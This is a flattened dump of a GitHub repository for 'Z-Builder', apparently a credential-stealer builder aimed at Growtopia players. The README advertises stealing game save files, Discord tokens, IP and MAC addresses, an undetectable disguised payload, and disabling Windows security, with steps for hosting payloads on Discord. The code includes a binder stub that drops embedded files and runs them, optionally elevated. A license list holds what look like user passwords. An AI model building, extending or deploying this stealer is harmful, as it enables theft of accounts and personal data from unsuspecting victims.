| EndGlobal 26 | -------------------------------------------------------------------------------- /GenerateReg/GenerateReg/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /GenerateReg/GenerateReg/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("GenerateReg")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("GenerateReg")] 13 | [assembly: AssemblyCopyright("Copyright © 2020")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("7d5d7e49-6243-44d3-8b71-fd57d0456057")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /MainStealerBaseCPP/MainStealerBaseCPP.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30413.136 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "MainStealerBaseCPP", "MainStealerBaseCPP\MainStealerBaseCPP.vcxproj", "{2B8CF1AA-BF5F-4BAE-8FFA-86AFA23D39DD}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {2B8CF1AA-BF5F-4BAE-8FFA-86AFA23D39DD}.Debug|x64.ActiveCfg = Debug|x64 17 | {2B8CF1AA-BF5F-4BAE-8FFA-86AFA23D39DD}.Debug|x64.Build.0 = Debug|x64 18 | {2B8CF1AA-BF5F-4BAE-8FFA-86AFA23D39DD}.Debug|x86.ActiveCfg = Debug|Win32 19 | {2B8CF1AA-BF5F-4BAE-8FFA-86AFA23D39DD}.Debug|x86.Build.0 = Debug|Win32 20 | {2B8CF1AA-BF5F-4BAE-8FFA-86AFA23D39DD}.Release|x64.ActiveCfg = Release|x64 21 | {2B8CF1AA-BF5F-4BAE-8FFA-86AFA23D39DD}.Release|x64.Build.0 = Release|x64 22 | {2B8CF1AA-BF5F-4BAE-8FFA-86AFA23D39DD}.Release|x86.ActiveCfg = Release|Win32 23 | {2B8CF1AA-BF5F-4BAE-8FFA-86AFA23D39DD}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {F405DCE2-4111-4C3F-ABE8-F385EB7D7FAA} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /MainStealerBaseCPP/MainStealerBaseCPP/FileWatcher.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | // Define available file changes 11 | enum class FileStatus { created, modified, erased }; 12 | class FileWatcher { 13 | public: 14 | std::string path_to_watch; 15 | std::chrono::duration delay; 16 | 17 | FileWatcher(std::string path_to_watch, std::chrono::duration delay) : path_to_watch{ path_to_watch }, delay{ delay } { 18 | for (auto& file : std::filesystem::recursive_directory_iterator(path_to_watch)) { 19 | paths_[file.path().string()] = std::filesystem::last_write_time(file); 20 | } 21 | } 22 | 23 | void start(const std::function& action) { 24 | while (running_) { 25 | std::this_thread::sleep_for(delay); 26 | auto it = paths_.begin(); 27 | while (it != paths_.end()) { 28 | if (!std::filesystem::exists(it->first)) { 29 | action(it->first, FileStatus::erased); 30 | it = paths_.erase(it); 31 | } 32 | else 33 | { 34 | it++; 35 | } 36 | } 37 | 38 | for (auto& file : std::filesystem::recursive_directory_iterator(path_to_watch)) { 39 | auto current_file_last_write_time = std::filesystem::last_write_time(file); 40 | if (!contains(file.path().string())) { 41 | paths_[file.path().string()] = current_file_last_write_time; 42 | action(file.path().string(), FileStatus::created); 43 | } 44 | else 45 | { 46 | if (paths_[file.path().string()] != current_file_last_write_time) { 47 | paths_[file.path().string()] = current_file_last_write_time; 48 | action(file.path().string(), FileStatus::modified); 49 | } 50 | } 51 | } 52 | } 53 | } 54 | private: 55 | std::unordered_map paths_; 56 | bool running_ = true; 57 | 58 | bool contains(const std::string& key) { 59 | auto el = paths_.find(key); 60 | return el != paths_.end(); 61 | } 62 | }; -------------------------------------------------------------------------------- /MainStealerBaseCPP/MainStealerBaseCPP/MainStealerBaseCPP.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | Header Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /MainStealerBaseCPP/MainStealerBaseCPP/MainStealerBaseCPP.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Z-Builder Source 2 | Z-Builder (an account stealer builder for Growtopia) source written in C++, C#, and C! 3 | # Features 4 | - Recover save.dats from the recycle bin
5 | - Locate save.dats from everywhere in the computer
6 | - One pass decryption method
7 | - Grabs IP address
8 | - Grabs discord token
9 | - Trace save.dats
10 | - Fully undetectable stealer with .CETRAINER extension
11 | - File pumper
12 | - File binder
13 | - AAP Bypass
14 | - Disable admin and windows security
15 | - Grabs MAC address
16 | - Uses embeds 17 | # How To Use 18 | 1. Compile certain features and upload them to discord and replace old links for several of the features.
19 | 2. Compile MainStealerBaseCPP and upload it.
20 | 3. Get the download link and replace it in Z-BuilderCL. 21 | # Terms of Use 22 | - In order to "claim" this source code's compiled entity as your own you will need to commit more than 5 RELEVANT features (non-ui related) but crediting Zeppy#2162 is always a necessity.
23 | - Zephyr and Stex are NOT RESPONSIBLE for what happens to you / what you do with Z-Builder.
24 | - Skidding is not alowed at all.
25 | - Only Stex#8520 is to be messaged with issues/questions with the builder IF your issue on GitHub isn't answered.
26 | https://discord.gg/rUHNtUtcsU - Discord Server 27 | 28 | Enjoy.
29 | Zeppy#1557
30 | Stex#7963 31 | -------------------------------------------------------------------------------- /Sources-PasteBin-Examples/BinderSrc.txt: -------------------------------------------------------------------------------- 1 | using System.Diagnostics; 2 | using System.IO; 3 | using System; 4 | using System.Reflection; 5 | 6 | namespace BinderStub 7 | { 8 | static class Program 9 | { 10 | static void Main() 11 | { 12 | //BinderStuffs 13 | } 14 | private static void Extract(string resource, string path, bool admin) 15 | { 16 | using (var assemblystream = Assembly.GetExecutingAssembly().GetManifestResourceStream(resource)) 17 | { 18 | using (var fileStream = new FileStream(Environment.ExpandEnvironmentVariables(path) + "\\" + resource, FileMode.Create, FileAccess.Write)) 19 | { 20 | assemblystream.CopyTo(fileStream); 21 | fileStream.Close(); 22 | } 23 | } 24 | if (admin) 25 | { 26 | Process process = new Process(); 27 | process.StartInfo.FileName = Environment.ExpandEnvironmentVariables(path) + "\\" + resource; 28 | process.StartInfo.UseShellExecute = true; 29 | process.StartInfo.Verb = "runas"; 30 | process.Start(); 31 | } 32 | else 33 | { 34 | Process.Start(Environment.ExpandEnvironmentVariables(path) + "\\" + resource); 35 | } 36 | } 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /Sources-PasteBin-Examples/FullLicenseKeys.txt: -------------------------------------------------------------------------------- 1 | admin/admin/BFEBFBFF000206A7/[zbuilder] 2 | KyStex/diexd/BFEBFBFF000306D4/[zeevikys] 3 | Crandetan/veevxuh/BFEBFBFF000406E3/[NotGenerated] 4 | Luxkas/Miseikis1/BFEBFBFF000906E9/[NotGenerated] 5 | NumberFive/egebey52/BFEBFBFF00040651/[NotGenerated] 6 | Moldrix/Richaccount/BFEBFBFF000006F2/[NotGenerated] 7 | XSM11/okretard1/178BFBFF00810F81/[NotGenerated] 8 | Zeevix/MrlolimiOnParas2006@./BFEBFBFF000906EA/[NotGenerated] -------------------------------------------------------------------------------- /Sources-PasteBin-Examples/LicenseKeysForCPP.txt: -------------------------------------------------------------------------------- 1 | [00000000{00000000}] 2 | [zbuilder{W2A7H6LW}] 3 | [zeevikys{AGB50952}] 4 | [00000000{00000000}] -------------------------------------------------------------------------------- /Z-Builder/.editorconfig: -------------------------------------------------------------------------------- 1 | [*.cs] 2 | 3 | # CS0618: Type or member is obsolete 4 | dotnet_diagnostic.CS0618.severity = none 5 | -------------------------------------------------------------------------------- /Z-Builder/Z-Builder.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30320.27 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Z-Builder", "Z-Builder\Z-Builder.csproj", "{246EDBBA-A5B0-4620-84E5-5DED4831B6F9}" 7 | EndProject 8 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{B8AFD6A5-26AA-434A-9F18-FAFC13764396}" 9 | ProjectSection(SolutionItems) = preProject 10 | .editorconfig = .editorconfig 11 | EndProjectSection 12 | EndProject 13 | Global 14 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 15 | Debug|Any CPU = Debug|Any CPU 16 | Release|Any CPU = Release|Any CPU 17 | EndGlobalSection 18 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 19 | {246EDBBA-A5B0-4620-84E5-5DED4831B6F9}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 20 | {246EDBBA-A5B0-4620-84E5-5DED4831B6F9}.Debug|Any CPU.Build.0 = Debug|Any CPU 21 | {246EDBBA-A5B0-4620-84E5-5DED4831B6F9}.Release|Any CPU.ActiveCfg = Release|Any CPU 22 | {246EDBBA-A5B0-4620-84E5-5DED4831B6F9}.Release|Any CPU.Build.0 = Release|Any CPU 23 | EndGlobalSection 24 | GlobalSection(SolutionProperties) = preSolution 25 | HideSolutionNode = FALSE 26 | EndGlobalSection 27 | GlobalSection(ExtensibilityGlobals) = postSolution 28 | SolutionGuid = {42F501F4-6023-41A9-A215-143BCC64C3FF} 29 | EndGlobalSection 30 | EndGlobal 31 | -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/Class1.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | 7 | namespace Z_Builder 8 | { 9 | class Class1 10 | { 11 | } 12 | } 13 | -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/Form1.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Configuration; 3 | using System.Collections.Generic; 4 | using System.ComponentModel; 5 | using System.Data; 6 | using System.Drawing; 7 | using System.Linq; 8 | using System.Management; 9 | using System.Text; 10 | using System.Threading.Tasks; 11 | using System.Windows.Forms; 12 | 13 | namespace Z_Builder 14 | { 15 | public partial class Form1 : MetroFramework.Forms.MetroForm 16 | { 17 | public Form1() 18 | { 19 | InitializeComponent(); 20 | } 21 | 22 | private void metroButton1_Click(object sender, EventArgs e) 23 | { 24 | MessageBox.Show("Sucessfully logged in!"); 25 | this.Hide(); 26 | var form2 = new Form2(); 27 | form2.Closed += (s, args) => this.Close(); 28 | form2.Show(); 29 | } 30 | } 31 | } 32 | -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Configuration; 3 | using System.Collections.Generic; 4 | using System.Linq; 5 | using System.Threading.Tasks; 6 | using System.Windows.Forms; 7 | 8 | namespace Z_Builder 9 | { 10 | static class Program 11 | { 12 | /// 13 | /// The main entry point for the application. 14 | /// 15 | [STAThread] 16 | static void Main() 17 | { 18 | Application.EnableVisualStyles(); 19 | Application.SetCompatibleTextRenderingDefault(false); 20 | Application.Run(new Form1()); 21 | } 22 | static public bool setSetting(string Key, string Value) 23 | { 24 | Configuration ConfigFile = 25 | ConfigurationManager.OpenExeConfiguration(ConfigurationUserLevel.None); 26 | bool KeyExists = false; 27 | 28 | foreach (string strKey in ConfigFile.AppSettings.Settings.AllKeys) 29 | { 30 | if (strKey == Key) 31 | { 32 | KeyExists = true; 33 | ConfigFile.AppSettings.Settings[Key].Value = Value; 34 | break; 35 | } 36 | } 37 | if (!KeyExists) 38 | { 39 | ConfigFile.AppSettings.Settings.Add(Key, Value); 40 | } 41 | ConfigFile.Save(ConfigurationSaveMode.Modified); 42 | ConfigurationManager.RefreshSection("appSettings"); 43 | return true; 44 | } 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("Z-Builder")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("Z-Builder")] 13 | [assembly: AssemblyCopyright("Copyright © 2020")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("246edbba-a5b0-4620-84e5-5ded4831b6f9")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/Properties/Settings.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.42000 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace Z_Builder.Properties 12 | { 13 | 14 | 15 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 16 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "11.0.0.0")] 17 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase 18 | { 19 | 20 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings()))); 21 | 22 | public static Settings Default 23 | { 24 | get 25 | { 26 | return defaultInstance; 27 | } 28 | } 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/Properties/Settings.settings: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/Resources/AntiDelete.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/Resources/AntiDelete.exe -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/Resources/Z-Icon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/Resources/Z-Icon.ico -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/bin/Debug/AnonFileAPI.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/bin/Debug/AnonFileAPI.dll -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/bin/Debug/MetroFramework.Design.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/bin/Debug/MetroFramework.Design.dll -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/bin/Debug/MetroFramework.Fonts.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/bin/Debug/MetroFramework.Fonts.dll -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/bin/Debug/MetroFramework.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/bin/Debug/MetroFramework.dll -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/bin/Debug/Microsoft.Xaml.Behaviors.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/bin/Debug/Microsoft.Xaml.Behaviors.dll -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/bin/Debug/System.Configuration.ConfigurationManager.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/bin/Debug/System.Configuration.ConfigurationManager.dll -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/bin/Debug/System.Security.AccessControl.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/bin/Debug/System.Security.AccessControl.dll -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/bin/Debug/System.Security.Permissions.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/bin/Debug/System.Security.Permissions.dll -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/bin/Debug/System.Security.Principal.Windows.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/bin/Debug/System.Security.Principal.Windows.dll -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/bin/Debug/Z-Builder.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/bin/Debug/Z-Builder.exe -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/bin/Debug/Z-Builder.exe.Config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/bin/Debug/Z-Builder.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/bin/Debug/Z-Builder.pdb -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/bin/Release/AnonFileAPI.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/bin/Release/AnonFileAPI.dll -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/bin/Release/MetroFramework.Design.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/bin/Release/MetroFramework.Design.dll -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/bin/Release/MetroFramework.Fonts.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/bin/Release/MetroFramework.Fonts.dll -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/bin/Release/MetroFramework.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/bin/Release/MetroFramework.dll -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/bin/Release/System.Configuration.ConfigurationManager.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/bin/Release/System.Configuration.ConfigurationManager.dll -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/bin/Release/System.Security.AccessControl.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/bin/Release/System.Security.AccessControl.dll -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/bin/Release/System.Security.Permissions.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/bin/Release/System.Security.Permissions.dll -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/bin/Release/System.Security.Principal.Windows.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/bin/Release/System.Security.Principal.Windows.dll -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/bin/Release/Z-Builder.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/bin/Release/Z-Builder.exe -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/bin/Release/Z-Builder.exe.Config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/bin/Release/Z-Builder.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/bin/Release/Z-Builder.pdb -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Debug/.NETFramework,Version=v4.7.2.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")] 5 | -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Debug/DesignTimeResolveAssemblyReferences.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/obj/Debug/DesignTimeResolveAssemblyReferences.cache -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Debug/TempPE/Code.Designer.cs.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/obj/Debug/TempPE/Code.Designer.cs.dll -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Debug/TempPE/Properties.Resources.Designer.cs.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/obj/Debug/TempPE/Properties.Resources.Designer.cs.dll -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Debug/Z-Builder.csproj.CopyComplete: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/obj/Debug/Z-Builder.csproj.CopyComplete -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Debug/Z-Builder.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 996ccb15166aa79c518196215bb7d0e100ee976e 2 | -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Debug/Z-Builder.csproj.GenerateResource.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/obj/Debug/Z-Builder.csproj.GenerateResource.cache -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Debug/Z-Builder.csproj.ResolveComReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/obj/Debug/Z-Builder.csproj.ResolveComReference.cache -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Debug/Z-Builder.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/obj/Debug/Z-Builder.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Debug/Z-Builder.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/obj/Debug/Z-Builder.exe -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Debug/Z-Builder.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/obj/Debug/Z-Builder.pdb -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Debug/Z_Builder.Form1.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/obj/Debug/Z_Builder.Form1.resources -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Debug/Z_Builder.Form2.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/Z-Builder/obj/Debug/Z_Builder.Form2.resources -------------------------------------------------------------------------------- /Z-Builder/Z-Builder/obj/Debug/Z_Builder.Properties.Resources.resources: -------------------------------------------------------------------------------- 